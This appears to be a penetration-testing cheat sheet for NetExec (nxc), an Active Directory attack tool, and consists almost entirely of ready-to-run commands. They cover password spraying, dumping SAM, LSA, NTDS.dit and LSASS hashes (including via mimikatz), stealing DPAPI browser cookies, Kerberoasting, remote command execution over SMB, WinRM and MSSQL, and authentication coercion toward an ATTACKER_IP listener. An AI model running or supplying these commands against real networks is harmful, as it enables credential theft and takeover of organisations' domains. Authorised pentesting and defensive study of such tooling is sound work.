NetExec (nxc)
NetExec (nxc) — active successor to CrackMapExec: SMB/LDAP/WinRM/MSSQL multi-protocol Swiss army knife for AD pentesting. Password spraying, credential dumping, Kerberoasting, BloodHound collection, LAPS, coercion checks, and 50+ modules. All payloads verified against netexec.wiki.
NetExec (nxc) is the actively-maintained successor to CrackMapExec. It sweeps subnets, sprays passwords, dumps credentials, and runs 50+ modules across SMB, LDAP, WinRM, and MSSQL with a single tool.
Install
pip3 install netexec
nxc --version
# Update
pip3 install --upgrade netexecTarget Formats
nxc smb 192.168.1.10
nxc smb 192.168.1.0/24
nxc smb 192.168.1.0-28 10.0.0.1-67
nxc smb ~/targets.txtOutput key: [+] = login success, (Pwn3d!) = local admin / code execution available.
SMB — Host Discovery & Fingerprint
# Subnet sweep: hostname, IP, domain, OS, SMB signing status
nxc smb 192.168.1.0/24
# NULL session / anonymous
nxc smb DC_IP -u '' -p ''
nxc smb DC_IP -u '' -p '' --users
nxc smb DC_IP -u '' -p '' --shares
nxc smb DC_IP -u '' -p '' --pass-pol
# Generate relay target list (SMB signing disabled)
nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txtSMB — Authentication & Spraying
# Domain auth
nxc smb 192.168.1.0/24 -u user -p 'Password1'
nxc smb 192.168.1.0/24 -u user -H NTLM_HASH
# Local auth (against SAM, not domain)
nxc smb 192.168.1.0/24 -u Administrator -p 'Password1' --local-auth
nxc smb 192.168.1.0/24 -u Administrator -H HASH --local-auth
# Kerberos
nxc smb dc.corp.local -u user -p pass -k
export KRB5CCNAME=ticket.ccache && nxc smb dc.corp.local --use-kcache
# Password spray — one password against all users
nxc smb DC_IP -u users.txt -p 'Summer2024' --continue-on-success
# Pair user[n]+pass[n] from file (no cross-product)
nxc smb DC_IP -u users.txt -p passes.txt --no-bruteforce --continue-on-successSMB — Enumeration
# Shares
nxc smb TARGET -u user -p pass --shares
# Users
nxc smb TARGET -u user -p pass --users
# Local groups
nxc smb TARGET -u user -p pass --local-group
# RID brute (enumerate accounts without a user list)
nxc smb DC_IP -u user -p pass --rid-brute
# Password policy (check lockout threshold before spraying)
nxc smb DC_IP -u user -p pass --pass-pol
# Logged-on users
nxc smb TARGET -u user -p pass --loggedon-users
# Active sessions
nxc smb TARGET -u user -p pass --qwinsta
# Processes
nxc smb TARGET -u user -p pass --tasklist
# AV/EDR detection (no admin needed)
nxc smb TARGET -u user -p pass -M enum_avSMB — Credential Dumping
# SAM (local account hashes) — local admin required
nxc smb TARGET -u admin -p pass --sam
# LSA secrets (service accounts, cached hashes) — local admin required
nxc smb TARGET -u admin -p pass --lsa
# NTDS.dit — all domain hashes (DA or DC local admin required)
nxc smb DC_IP -u admin -p pass --ntds
nxc smb DC_IP -u admin -p pass --ntds vss # via Volume Shadow Copy
nxc smb DC_IP -u admin -p pass --ntds --enabled # enabled accounts only
# LSASS dump via modules
nxc smb TARGET -u admin -p pass -M lsassy
nxc smb TARGET -u admin -p pass -M nanodump
nxc smb TARGET -u admin -p pass -M mimikatz
# DPAPI — Credential Manager + browser creds
nxc smb TARGET -u user -p pass --dpapi
nxc smb TARGET -u user -p pass --dpapi cookies
nxc smb TARGET -u user -p pass --dpapi nosystem # skip SYSTEM creds (stealthier)
# LAPS managed local admin password
nxc smb TARGET -u laps-reader -p pass --laps
# GPP / SYSVOL cpassword
nxc smb DC_IP -u user -p pass -M gpp_password
nxc smb DC_IP -u user -p pass -M gpp_autologin
# Third-party app credentials
nxc smb TARGET -u user -p pass -M veeam
nxc smb TARGET -u user -p pass -M winscp
nxc smb TARGET -u user -p pass -M vncSMB — Command Execution
# Auto-selects best execution method
nxc smb TARGET -u admin -p pass -x whoami
# Force specific method
nxc smb TARGET -u admin -p pass -x whoami --exec-method wmiexec
nxc smb TARGET -u admin -p pass -x whoami --exec-method smbexec
nxc smb TARGET -u admin -p pass -x whoami --exec-method atexecSMB — Vulnerability Checks
nxc smb TARGET -u '' -p '' -M zerologon
nxc smb TARGET -u user -p pass -M nopac
nxc smb TARGET -u '' -p '' -M ms17-010
nxc smb TARGET -u '' -p '' -M smbghost
nxc smb TARGET -u '' -p '' -M printnightmare
# Coercion vector check (PrinterBug, PetitPotam, DFSCoerce, etc.)
nxc smb TARGET -u '' -p '' -M coerce_plus
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP
nxc smb TARGET -u '' -p '' -M coerce_plus -o METHOD=PetitPotamLDAP Protocol
# Enumerate
nxc ldap DC_IP -u user -p pass --users
nxc ldap DC_IP -u user -p pass --groups
nxc ldap DC_IP -u user -p pass --computers
nxc ldap DC_IP -u user -p pass --admin-count
# Kerberoasting → hashcat -m 13100
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt
# AS-REP Roasting → hashcat -m 18200
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt # no password needed
# LAPS passwords
nxc ldap DC_IP -u user -p pass --laps
# gMSA passwords
nxc ldap DC_IP -u user -p pass --gmsa
# BloodHound collection
nxc ldap DC_IP -u user -p pass --bloodhound --collection All
# Delegation enumeration
nxc ldap DC_IP -u user -p pass --find-delegation
nxc ldap DC_IP -u user -p pass --trusted-for-delegation
# Machine Account Quota (MAQ) — needed for RBCD attack
nxc ldap DC_IP -u user -p pass -M maq
# LDAP signing check
nxc ldap DC_IP -u user -p pass -M ldap-checker
# ADCS discovery
nxc ldap DC_IP -u user -p pass -M adcs
# Password in description field
nxc ldap DC_IP -u user -p pass -M get-desc-users
# Fine-grained password policies
nxc ldap DC_IP -u user -p pass --pso
# Raw LDAP query
nxc ldap DC_IP -u user -p pass --query "(adminCount=1)" "sAMAccountName"WinRM Protocol
# Test auth + spray
nxc winrm 192.168.1.0/24 -u user -p pass
# Execute PowerShell command (capital -X)
nxc winrm TARGET -u user -p pass -X whoami
nxc winrm TARGET -u user -p pass -X 'Get-Process | Select -First 5'
# With hash
nxc winrm TARGET -u user -H HASH -X whoami
# Dump from WinRM
nxc winrm TARGET -u user -p pass --sam
nxc winrm TARGET -u user -p pass --lsa
-X= PowerShell (WinRM).-x= cmd.exe (SMB). Capital matters.
MSSQL Protocol
# Discovery
nxc mssql 192.168.1.0/24
# Windows auth
nxc mssql TARGET -u user -p pass
# SQL local auth
nxc mssql TARGET -u sa -p pass --local-auth
# SQL query
nxc mssql TARGET -u sa -p pass --local-auth -q 'SELECT @@version'
# OS command via xp_cmdshell (auto-enables if off)
nxc mssql TARGET -u sa -p pass --local-auth -x whoami
# Impersonation privilege check
nxc mssql TARGET -u user -p pass -M mssql_priv
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=privesc
# Linked servers
nxc mssql TARGET -u user -p pass -M enum_links
nxc mssql TARGET -u user -p pass -M link_xpcmd -o LINKED_SERVER=SERVER2 CMD='whoami'Quick Reference
| Flag | Effect |
|---|---|
--local-auth | Authenticate against local SAM |
--continue-on-success | Don’t stop after first valid cred |
--no-bruteforce | Pair user[n]+pass[n] only |
-k / --use-kcache | Kerberos auth |
-x | Run cmd.exe command (SMB) |
-X | Run PowerShell command (WinRM) |
--ntds vss | Dump NTDS via VSS |
--dpapi nosystem | Skip SYSTEM creds |
--laps [name] | Read LAPS password |
--bloodhound --collection All | Full BloodHound ingest |
--gen-relay-list | Hosts without SMB signing |
--asreproast | AS-REP hashes to file |
--kerberoasting | Kerberoast hashes to file |
-M coerce_plus | Check coercion vectors |